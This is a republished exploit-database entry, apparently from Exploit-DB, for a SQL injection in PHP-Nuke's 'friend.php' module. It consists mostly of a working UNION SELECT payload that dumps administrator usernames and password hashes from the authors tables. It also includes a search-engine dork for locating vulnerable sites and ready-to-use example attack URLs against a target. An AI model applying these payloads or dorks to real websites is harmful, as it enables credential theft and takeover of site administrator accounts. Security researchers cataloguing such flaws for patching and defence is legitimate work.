PHP-Nuke – ‘friend.php’ Module SQL Injection - 体验盒子

作者： CMD

日期： 2010-05-07

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12525/

# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]
# Date: [05.05.2010]
# Author: [CMD]
# Contact : cemede@ilkposta.com
# Version: [all version]

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Code : [/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/*]

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Dork : inurl:friend.php?op=FriendSend

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

# Th@nks : AmeN, MUS4LLAT, Kayahan, Sinaritx, JacKaL, Qas&#305;m, Metrp0l, Despot...

# Says : Hemso bak bi dene bug daha xD ...